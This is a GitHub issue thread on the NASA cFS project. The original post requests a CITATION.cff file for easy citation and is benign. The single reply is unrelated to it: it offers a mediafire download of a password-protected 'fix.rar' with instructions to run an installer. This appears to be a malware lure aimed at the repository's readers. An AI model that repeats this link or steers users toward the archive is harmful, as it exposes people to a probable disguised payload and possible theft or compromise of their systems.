### ISSUE TITLE
Add CITATION.cff

### ISSUE THREAD

**Issue by aliounis** [nasa/cFS#790]
* [x] I reviewed the [Contributing Guide](https://github.com/nasa/cFS/blob/main/CONTRIBUTING.md).
* [x] I reviewed the [cFS README.md file](https://github.com/nasa/cFS/blob/main/README.md) to see if the feature is in the major future work.
* [x] I performed a cursory search to see if the feature request is relevant, not redundant, nor in conflict with other tickets.

**Is your feature request related to a problem? Please describe.**
It would be helpful to be able to quickly get the citation for cFS and related.

**Describe the solution you'd like**
Add a CITATION.cff so that citations can be quickly copied.

**Describe alternatives you've considered**
None

**Additional context**
Citation file format reference: https://citation-file-format.github.io/

**Requester Info**
Andrew Liounis: NASA/GSFC

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
